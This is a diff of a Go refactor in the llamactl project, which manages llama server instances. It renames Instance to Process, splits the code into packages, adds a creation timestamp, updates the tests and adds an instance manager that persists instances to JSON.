optionsCopy := validateAndCopyOptions(name, options)
|
optionsCopy := validateAndCopyOptions(name, options)
|
||||||
// Apply defaults
|
// Apply defaults
|
||||||
applyDefaultOptions(optionsCopy, globalSettings)
|
applyDefaultOptions(optionsCopy, globalSettings)
|
||||||
// Create the instance logger
|
// Create the instance logger
|
||||||
logger := NewInstanceLogger(name, globalSettings.LogDirectory)
|
logger := NewInstanceLogger(name, globalSettings.LogsDir)
|
||||||
|
|
||||||
return &Instance{
|
return &Process{
|
||||||
Name: name,
|
Name: name,
|
||||||
options: optionsCopy,
|
options: optionsCopy,
|
||||||
globalSettings: globalSettings,
|
globalSettings: globalSettings,
|
||||||
@@ -163,13 +165,13 @@ func NewInstance(name string, globalSettings *InstancesConfig, options *CreateIn
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func (i *Instance) GetOptions() *CreateInstanceOptions {
|
func (i *Process) GetOptions() *CreateInstanceOptions {
|
||||||
i.mu.RLock()
|
i.mu.RLock()
|
||||||
defer i.mu.RUnlock()
|
defer i.mu.RUnlock()
|
||||||
return i.options
|
return i.options
|
||||||
}
|
}
|
||||||
|
|
||||||
func (i *Instance) SetOptions(options *CreateInstanceOptions) {
|
func (i *Process) SetOptions(options *CreateInstanceOptions) {
|
||||||
i.mu.Lock()
|
i.mu.Lock()
|
||||||
defer i.mu.Unlock()
|
defer i.mu.Unlock()
|
||||||
|
|
||||||
@@ -188,7 +190,7 @@ func (i *Instance) SetOptions(options *CreateInstanceOptions) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// GetProxy returns the reverse proxy for this instance, creating it if needed
|
// GetProxy returns the reverse proxy for this instance, creating it if needed
|
||||||
func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
|
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
|
||||||
i.mu.Lock()
|
i.mu.Lock()
|
||||||
defer i.mu.Unlock()
|
defer i.mu.Unlock()
|
||||||
|
|
||||||
@@ -225,7 +227,7 @@ func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// MarshalJSON implements json.Marshaler for Instance
|
// MarshalJSON implements json.Marshaler for Instance
|
||||||
func (i *Instance) MarshalJSON() ([]byte, error) {
|
func (i *Process) MarshalJSON() ([]byte, error) {
|
||||||
// Use read lock since we're only reading data
|
// Use read lock since we're only reading data
|
||||||
i.mu.RLock()
|
i.mu.RLock()
|
||||||
defer i.mu.RUnlock()
|
defer i.mu.RUnlock()
|
||||||
@@ -235,22 +237,25 @@ func (i *Instance) MarshalJSON() ([]byte, error) {
|
|||||||
Name string `json:"name"`
|
Name string `json:"name"`
|
||||||
Options *CreateInstanceOptions `json:"options,omitempty"`
|
Options *CreateInstanceOptions `json:"options,omitempty"`
|
||||||
Running bool `json:"running"`
|
Running bool `json:"running"`
|
||||||
|
Created int64 `json:"created,omitempty"`
|
||||||
}{
|
}{
|
||||||
Name: i.Name,
|
Name: i.Name,
|
||||||
Options: i.options,
|
Options: i.options,
|
||||||
Running: i.Running,
|
Running: i.Running,
|
||||||
|
Created: i.Created,
|
||||||
}
|
}
|
||||||
|
|
||||||
return json.Marshal(temp)
|
return json.Marshal(temp)
|
||||||
}
|
}
|
||||||
|
|
||||||
// UnmarshalJSON implements json.Unmarshaler for Instance
|
// UnmarshalJSON implements json.Unmarshaler for Instance
|
||||||
func (i *Instance) UnmarshalJSON(data []byte) error {
|
func (i *Process) UnmarshalJSON(data []byte) error {
|
||||||
// Create a temporary struct for unmarshalling
|
// Create a temporary struct for unmarshalling
|
||||||
temp := struct {
|
temp := struct {
|
||||||
Name string `json:"name"`
|
Name string `json:"name"`
|
||||||
Options *CreateInstanceOptions `json:"options,omitempty"`
|
Options *CreateInstanceOptions `json:"options,omitempty"`
|
||||||
Running bool `json:"running"`
|
Running bool `json:"running"`
|
||||||
|
Created int64 `json:"created,omitempty"`
|
||||||
}{}
|
}{}
|
||||||
|
|
||||||
if err := json.Unmarshal(data, &temp); err != nil {
|
if err := json.Unmarshal(data, &temp); err != nil {
|
||||||
@@ -260,6 +265,7 @@ func (i *Instance) UnmarshalJSON(data []byte) error {
|
|||||||
// Set the fields
|
// Set the fields
|
||||||
i.Name = temp.Name
|
i.Name = temp.Name
|
||||||
i.Running = temp.Running
|
i.Running = temp.Running
|
||||||
|
i.Created = temp.Created
|
||||||
|
|
||||||
// Handle options with validation but no defaults
|
// Handle options with validation but no defaults
|
||||||
if temp.Options != nil {
|
if temp.Options != nil {
|
||||||
@@ -1,28 +1,30 @@
|
|||||||
package llamactl_test
|
package instance_test
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
|
"llamactl/pkg/backends/llamacpp"
|
||||||
|
"llamactl/pkg/config"
|
||||||
|
"llamactl/pkg/instance"
|
||||||
|
"llamactl/pkg/testutil"
|
||||||
"testing"
|
"testing"
|
||||||
|
|
||||||
llamactl "llamactl/pkg"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
func TestNewInstance(t *testing.T) {
|
func TestNewInstance(t *testing.T) {
|
||||||
globalSettings := &llamactl.InstancesConfig{
|
globalSettings := &config.InstancesConfig{
|
||||||
LogDirectory: "/tmp/test",
|
LogsDir: "/tmp/test",
|
||||||
DefaultAutoRestart: true,
|
DefaultAutoRestart: true,
|
||||||
DefaultMaxRestarts: 3,
|
DefaultMaxRestarts: 3,
|
||||||
DefaultRestartDelay: 5,
|
DefaultRestartDelay: 5,
|
||||||
}
|
}
|
||||||
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
options := &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||||
|
|
||||||
if instance.Name != "test-instance" {
|
if instance.Name != "test-instance" {
|
||||||
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
|
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
|
||||||
@@ -53,8 +55,8 @@ func TestNewInstance(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
func TestNewInstance_WithRestartOptions(t *testing.T) {
|
func TestNewInstance_WithRestartOptions(t *testing.T) {
|
||||||
globalSettings := &llamactl.InstancesConfig{
|
globalSettings := &config.InstancesConfig{
|
||||||
LogDirectory: "/tmp/test",
|
LogsDir: "/tmp/test",
|
||||||
DefaultAutoRestart: true,
|
DefaultAutoRestart: true,
|
||||||
DefaultMaxRestarts: 3,
|
DefaultMaxRestarts: 3,
|
||||||
DefaultRestartDelay: 5,
|
DefaultRestartDelay: 5,
|
||||||
@@ -65,16 +67,16 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
|
|||||||
maxRestarts := 10
|
maxRestarts := 10
|
||||||
restartDelay := 15
|
restartDelay := 15
|
||||||
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
options := &instance.CreateInstanceOptions{
|
||||||
AutoRestart: &autoRestart,
|
AutoRestart: &autoRestart,
|
||||||
MaxRestarts: &maxRestarts,
|
MaxRestarts: &maxRestarts,
|
||||||
RestartDelay: &restartDelay,
|
RestartDelay: &restartDelay,
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||||
opts := instance.GetOptions()
|
opts := instance.GetOptions()
|
||||||
|
|
||||||
// Check that explicit values override defaults
|
// Check that explicit values override defaults
|
||||||
@@ -90,8 +92,8 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
func TestNewInstance_ValidationAndDefaults(t *testing.T) {
|
func TestNewInstance_ValidationAndDefaults(t *testing.T) {
|
||||||
globalSettings := &llamactl.InstancesConfig{
|
globalSettings := &config.InstancesConfig{
|
||||||
LogDirectory: "/tmp/test",
|
LogsDir: "/tmp/test",
|
||||||
DefaultAutoRestart: true,
|
DefaultAutoRestart: true,
|
||||||
DefaultMaxRestarts: 3,
|
DefaultMaxRestarts: 3,
|
||||||
DefaultRestartDelay: 5,
|
DefaultRestartDelay: 5,
|
||||||
@@ -101,15 +103,15 @@ func TestNewInstance_ValidationAndDefaults(t *testing.T) {
|
|||||||
invalidMaxRestarts := -5
|
invalidMaxRestarts := -5
|
||||||
invalidRestartDelay := -10
|
invalidRestartDelay := -10
|
||||||
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
options := &instance.CreateInstanceOptions{
|
||||||
MaxRestarts: &invalidMaxRestarts,
|
MaxRestarts: &invalidMaxRestarts,
|
||||||
RestartDelay: &invalidRestartDelay,
|
RestartDelay: &invalidRestartDelay,
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||||
opts := instance.GetOptions()
|
opts := instance.GetOptions()
|
||||||
|
|
||||||
// Check that negative values were corrected to 0
|
// Check that negative values were corrected to 0
|
||||||
@@ -122,32 +124,32 @@ func TestNewInstance_ValidationAndDefaults(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
func TestSetOptions(t *testing.T) {
|
func TestSetOptions(t *testing.T) {
|
||||||
globalSettings := &llamactl.InstancesConfig{
|
globalSettings := &config.InstancesConfig{
|
||||||
LogDirectory: "/tmp/test",
|
LogsDir: "/tmp/test",
|
||||||
DefaultAutoRestart: true,
|
DefaultAutoRestart: true,
|
||||||
DefaultMaxRestarts: 3,
|
DefaultMaxRestarts: 3,
|
||||||
DefaultRestartDelay: 5,
|
DefaultRestartDelay: 5,
|
||||||
}
|
}
|
||||||
|
|
||||||
initialOptions := &llamactl.CreateInstanceOptions{
|
initialOptions := &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
instance := llamactl.NewInstance("test-instance", globalSettings, initialOptions)
|
inst := instance.NewInstance("test-instance", globalSettings, initialOptions)
|
||||||
|
|
||||||
// Update options
|
// Update options
|
||||||
newOptions := &llamactl.CreateInstanceOptions{
|
newOptions := &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: "/path/to/new-model.gguf",
|
Model: "/path/to/new-model.gguf",
|
||||||
Port: 8081,
|
Port: 8081,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
instance.SetOptions(newOptions)
|
inst.SetOptions(newOptions)
|
||||||
opts := instance.GetOptions()
|
opts := inst.GetOptions()
|
||||||
|
|
||||||
if opts.Model != "/path/to/new-model.gguf" {
|
if opts.Model != "/path/to/new-model.gguf" {
|
||||||
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
|
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
|
||||||
@@ -163,20 +165,20 @@ func TestSetOptions(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
func TestSetOptions_NilOptions(t *testing.T) {
|
func TestSetOptions_NilOptions(t *testing.T) {
|
||||||
globalSettings := &llamactl.InstancesConfig{
|
globalSettings := &config.InstancesConfig{
|
||||||
LogDirectory: "/tmp/test",
|
LogsDir: "/tmp/test",
|
||||||
DefaultAutoRestart: true,
|
DefaultAutoRestart: true,
|
||||||
DefaultMaxRestarts: 3,
|
DefaultMaxRestarts: 3,
|
||||||
DefaultRestartDelay: 5,
|
DefaultRestartDelay: 5,
|
||||||
}
|
}
|
||||||
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
options := &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||||
originalOptions := instance.GetOptions()
|
originalOptions := instance.GetOptions()
|
||||||
|
|
||||||
// Try to set nil options
|
// Try to set nil options
|
||||||
@@ -190,21 +192,21 @@ func TestSetOptions_NilOptions(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
func TestGetProxy(t *testing.T) {
|
func TestGetProxy(t *testing.T) {
|
||||||
globalSettings := &llamactl.InstancesConfig{
|
globalSettings := &config.InstancesConfig{
|
||||||
LogDirectory: "/tmp/test",
|
LogsDir: "/tmp/test",
|
||||||
}
|
}
|
||||||
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
options := &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Host: "localhost",
|
Host: "localhost",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
inst := instance.NewInstance("test-instance", globalSettings, options)
|
||||||
|
|
||||||
// Get proxy for the first time
|
// Get proxy for the first time
|
||||||
proxy1, err := instance.GetProxy()
|
proxy1, err := inst.GetProxy()
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("GetProxy failed: %v", err)
|
t.Fatalf("GetProxy failed: %v", err)
|
||||||
}
|
}
|
||||||
@@ -213,7 +215,7 @@ func TestGetProxy(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Get proxy again - should return cached version
|
// Get proxy again - should return cached version
|
||||||
proxy2, err := instance.GetProxy()
|
proxy2, err := inst.GetProxy()
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("GetProxy failed: %v", err)
|
t.Fatalf("GetProxy failed: %v", err)
|
||||||
}
|
}
|
||||||
@@ -223,21 +225,21 @@ func TestGetProxy(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
func TestMarshalJSON(t *testing.T) {
|
func TestMarshalJSON(t *testing.T) {
|
||||||
globalSettings := &llamactl.InstancesConfig{
|
globalSettings := &config.InstancesConfig{
|
||||||
LogDirectory: "/tmp/test",
|
LogsDir: "/tmp/test",
|
||||||
DefaultAutoRestart: true,
|
DefaultAutoRestart: true,
|
||||||
DefaultMaxRestarts: 3,
|
DefaultMaxRestarts: 3,
|
||||||
DefaultRestartDelay: 5,
|
DefaultRestartDelay: 5,
|
||||||
}
|
}
|
||||||
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
options := &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||||
|
|
||||||
data, err := json.Marshal(instance)
|
data, err := json.Marshal(instance)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -284,20 +286,20 @@ func TestUnmarshalJSON(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}`
|
}`
|
||||||
|
|
||||||
var instance llamactl.Instance
|
var inst instance.Process
|
||||||
err := json.Unmarshal([]byte(jsonData), &instance)
|
err := json.Unmarshal([]byte(jsonData), &inst)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("JSON unmarshal failed: %v", err)
|
t.Fatalf("JSON unmarshal failed: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
if instance.Name != "test-instance" {
|
if inst.Name != "test-instance" {
|
||||||
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
|
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
|
||||||
}
|
}
|
||||||
if !instance.Running {
|
if !inst.Running {
|
||||||
t.Error("Expected running to be true")
|
t.Error("Expected running to be true")
|
||||||
}
|
}
|
||||||
|
|
||||||
opts := instance.GetOptions()
|
opts := inst.GetOptions()
|
||||||
if opts == nil {
|
if opts == nil {
|
||||||
t.Fatal("Expected options to be set")
|
t.Fatal("Expected options to be set")
|
||||||
}
|
}
|
||||||
@@ -324,13 +326,13 @@ func TestUnmarshalJSON_PartialOptions(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}`
|
}`
|
||||||
|
|
||||||
var instance llamactl.Instance
|
var inst instance.Process
|
||||||
err := json.Unmarshal([]byte(jsonData), &instance)
|
err := json.Unmarshal([]byte(jsonData), &inst)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("JSON unmarshal failed: %v", err)
|
t.Fatalf("JSON unmarshal failed: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
opts := instance.GetOptions()
|
opts := inst.GetOptions()
|
||||||
if opts.Model != "/path/to/model.gguf" {
|
if opts.Model != "/path/to/model.gguf" {
|
||||||
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
|
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
|
||||||
}
|
}
|
||||||
@@ -348,20 +350,20 @@ func TestUnmarshalJSON_NoOptions(t *testing.T) {
|
|||||||
"running": false
|
"running": false
|
||||||
}`
|
}`
|
||||||
|
|
||||||
var instance llamactl.Instance
|
var inst instance.Process
|
||||||
err := json.Unmarshal([]byte(jsonData), &instance)
|
err := json.Unmarshal([]byte(jsonData), &inst)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("JSON unmarshal failed: %v", err)
|
t.Fatalf("JSON unmarshal failed: %v", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
if instance.Name != "test-instance" {
|
if inst.Name != "test-instance" {
|
||||||
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
|
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
|
||||||
}
|
}
|
||||||
if instance.Running {
|
if inst.Running {
|
||||||
t.Error("Expected running to be false")
|
t.Error("Expected running to be false")
|
||||||
}
|
}
|
||||||
|
|
||||||
opts := instance.GetOptions()
|
opts := inst.GetOptions()
|
||||||
if opts != nil {
|
if opts != nil {
|
||||||
t.Error("Expected options to be nil when not provided in JSON")
|
t.Error("Expected options to be nil when not provided in JSON")
|
||||||
}
|
}
|
||||||
@@ -384,42 +386,42 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "valid positive values",
|
name: "valid positive values",
|
||||||
maxRestarts: intPtr(10),
|
maxRestarts: testutil.IntPtr(10),
|
||||||
restartDelay: intPtr(30),
|
restartDelay: testutil.IntPtr(30),
|
||||||
expectedMax: 10,
|
expectedMax: 10,
|
||||||
expectedDelay: 30,
|
expectedDelay: 30,
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "zero values",
|
name: "zero values",
|
||||||
maxRestarts: intPtr(0),
|
maxRestarts: testutil.IntPtr(0),
|
||||||
restartDelay: intPtr(0),
|
restartDelay: testutil.IntPtr(0),
|
||||||
expectedMax: 0,
|
expectedMax: 0,
|
||||||
expectedDelay: 0,
|
expectedDelay: 0,
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "negative values should be corrected",
|
name: "negative values should be corrected",
|
||||||
maxRestarts: intPtr(-5),
|
maxRestarts: testutil.IntPtr(-5),
|
||||||
restartDelay: intPtr(-10),
|
restartDelay: testutil.IntPtr(-10),
|
||||||
expectedMax: 0,
|
expectedMax: 0,
|
||||||
expectedDelay: 0,
|
expectedDelay: 0,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
globalSettings := &llamactl.InstancesConfig{
|
globalSettings := &config.InstancesConfig{
|
||||||
LogDirectory: "/tmp/test",
|
LogsDir: "/tmp/test",
|
||||||
}
|
}
|
||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
options := &llamactl.CreateInstanceOptions{
|
options := &instance.CreateInstanceOptions{
|
||||||
MaxRestarts: tt.maxRestarts,
|
MaxRestarts: tt.maxRestarts,
|
||||||
RestartDelay: tt.restartDelay,
|
RestartDelay: tt.restartDelay,
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
instance := llamactl.NewInstance("test", globalSettings, options)
|
instance := instance.NewInstance("test", globalSettings, options)
|
||||||
opts := instance.GetOptions()
|
opts := instance.GetOptions()
|
||||||
|
|
||||||
if tt.maxRestarts != nil {
|
if tt.maxRestarts != nil {
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
package llamactl
|
package instance
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"context"
|
"context"
|
||||||
@@ -11,7 +11,7 @@ import (
|
|||||||
)
|
)
|
||||||
|
|
||||||
// Start starts the llama server instance and returns an error if it fails.
|
// Start starts the llama server instance and returns an error if it fails.
|
||||||
func (i *Instance) Start() error {
|
func (i *Process) Start() error {
|
||||||
i.mu.Lock()
|
i.mu.Lock()
|
||||||
defer i.mu.Unlock()
|
defer i.mu.Unlock()
|
||||||
|
|
||||||
@@ -75,7 +75,7 @@ func (i *Instance) Start() error {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Stop terminates the subprocess
|
// Stop terminates the subprocess
|
||||||
func (i *Instance) Stop() error {
|
func (i *Process) Stop() error {
|
||||||
i.mu.Lock()
|
i.mu.Lock()
|
||||||
|
|
||||||
if !i.Running {
|
if !i.Running {
|
||||||
@@ -140,7 +140,7 @@ func (i *Instance) Stop() error {
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func (i *Instance) monitorProcess() {
|
func (i *Process) monitorProcess() {
|
||||||
defer func() {
|
defer func() {
|
||||||
i.mu.Lock()
|
i.mu.Lock()
|
||||||
if i.monitorDone != nil {
|
if i.monitorDone != nil {
|
||||||
@@ -181,7 +181,7 @@ func (i *Instance) monitorProcess() {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// handleRestart manages the restart process while holding the lock
|
// handleRestart manages the restart process while holding the lock
|
||||||
func (i *Instance) handleRestart() {
|
func (i *Process) handleRestart() {
|
||||||
// Validate restart conditions and get safe parameters
|
// Validate restart conditions and get safe parameters
|
||||||
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
|
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
|
||||||
if !shouldRestart {
|
if !shouldRestart {
|
||||||
@@ -223,7 +223,7 @@ func (i *Instance) handleRestart() {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// validateRestartConditions checks if the instance should be restarted and returns the parameters
|
// validateRestartConditions checks if the instance should be restarted and returns the parameters
|
||||||
func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
|
func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
|
||||||
if i.options == nil {
|
if i.options == nil {
|
||||||
log.Printf("Instance %s not restarting: options are nil", i.Name)
|
log.Printf("Instance %s not restarting: options are nil", i.Name)
|
||||||
return false, 0, 0
|
return false, 0, 0
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
package llamactl
|
package instance
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"bufio"
|
"bufio"
|
||||||
@@ -52,7 +52,7 @@ func (i *InstanceLogger) Create() error {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// GetLogs retrieves the last n lines of logs from the instance
|
// GetLogs retrieves the last n lines of logs from the instance
|
||||||
func (i *Instance) GetLogs(num_lines int) (string, error) {
|
func (i *Process) GetLogs(num_lines int) (string, error) {
|
||||||
i.mu.RLock()
|
i.mu.RLock()
|
||||||
logFileName := i.logger.logFilePath
|
logFileName := i.logger.logFilePath
|
||||||
i.mu.RUnlock()
|
i.mu.RUnlock()
|
||||||
@@ -1,6 +1,6 @@
|
|||||||
//go:build !windows
|
//go:build !windows
|
||||||
|
|
||||||
package llamactl
|
package instance
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"os/exec"
|
"os/exec"
|
||||||
@@ -1,6 +1,6 @@
|
|||||||
//go:build windows
|
//go:build windows
|
||||||
|
|
||||||
package llamactl
|
package instance
|
||||||
|
|
||||||
import "os/exec"
|
import "os/exec"
|
||||||
|
|
||||||
222
pkg/manager/manager.go
Normal file
222
pkg/manager/manager.go
Normal file
@@ -0,0 +1,222 @@
|
|||||||
|
package manager
|
||||||
|
|
||||||
|
import (
|
||||||
|
"encoding/json"
|
||||||
|
"fmt"
|
||||||
|
"llamactl/pkg/config"
|
||||||
|
"llamactl/pkg/instance"
|
||||||
|
"log"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
|
"sync"
|
||||||
|
)
|
||||||
|
|
||||||
|
// InstanceManager defines the interface for managing instances of the llama server.
|
||||||
|
type InstanceManager interface {
|
||||||
|
ListInstances() ([]*instance.Process, error)
|
||||||
|
CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
|
||||||
|
GetInstance(name string) (*instance.Process, error)
|
||||||
|
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
|
||||||
|
DeleteInstance(name string) error
|
||||||
|
StartInstance(name string) (*instance.Process, error)
|
||||||
|
StopInstance(name string) (*instance.Process, error)
|
||||||
|
RestartInstance(name string) (*instance.Process, error)
|
||||||
|
GetInstanceLogs(name string) (string, error)
|
||||||
|
Shutdown()
|
||||||
|
}
|
||||||
|
|
||||||
|
type instanceManager struct {
|
||||||
|
mu sync.RWMutex
|
||||||
|
instances map[string]*instance.Process
|
||||||
|
ports map[int]bool
|
||||||
|
instancesConfig config.InstancesConfig
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewInstanceManager creates a new instance of InstanceManager.
|
||||||
|
func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
|
||||||
|
im := &instanceManager{
|
||||||
|
instances: make(map[string]*instance.Process),
|
||||||
|
ports: make(map[int]bool),
|
||||||
|
instancesConfig: instancesConfig,
|
||||||
|
}
|
||||||
|
|
||||||
|
// Load existing instances from disk
|
||||||
|
if err := im.loadInstances(); err != nil {
|
||||||
|
log.Printf("Error loading instances: %v", err)
|
||||||
|
}
|
||||||
|
return im
|
||||||
|
}
|
||||||
|
|
||||||
|
func (im *instanceManager) getNextAvailablePort() (int, error) {
|
||||||
|
portRange := im.instancesConfig.PortRange
|
||||||
|
|
||||||
|
for port := portRange[0]; port <= portRange[1]; port++ {
|
||||||
|
if !im.ports[port] {
|
||||||
|
im.ports[port] = true
|
||||||
|
return port, nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return 0, fmt.Errorf("no available ports in the specified range")
|
||||||
|
}
|
||||||
|
|
||||||
|
// persistInstance saves an instance to its JSON file
|
||||||
|
func (im *instanceManager) persistInstance(instance *instance.Process) error {
|
||||||
|
if im.instancesConfig.InstancesDir == "" {
|
||||||
|
return nil // Persistence disabled
|
||||||
|
}
|
||||||
|
|
||||||
|
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
|
||||||
|
tempPath := instancePath + ".tmp"
|
||||||
|
|
||||||
|
// Serialize instance to JSON
|
||||||
|
jsonData, err := json.MarshalIndent(instance, "", " ")
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Write to temporary file first
|
||||||
|
if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
|
||||||
|
return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Atomic rename
|
||||||
|
if err := os.Rename(tempPath, instancePath); err != nil {
|
||||||
|
os.Remove(tempPath) // Clean up temp file
|
||||||
|
return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (im *instanceManager) Shutdown() {
|
||||||
|
im.mu.Lock()
|
||||||
|
defer im.mu.Unlock()
|
||||||
|
|
||||||
|
var wg sync.WaitGroup
|
||||||
|
wg.Add(len(im.instances))
|
||||||
|
|
||||||
|
for name, inst := range im.instances {
|
||||||
|
if !inst.Running {
|
||||||
|
wg.Done() // If instance is not running, just mark it as done
|
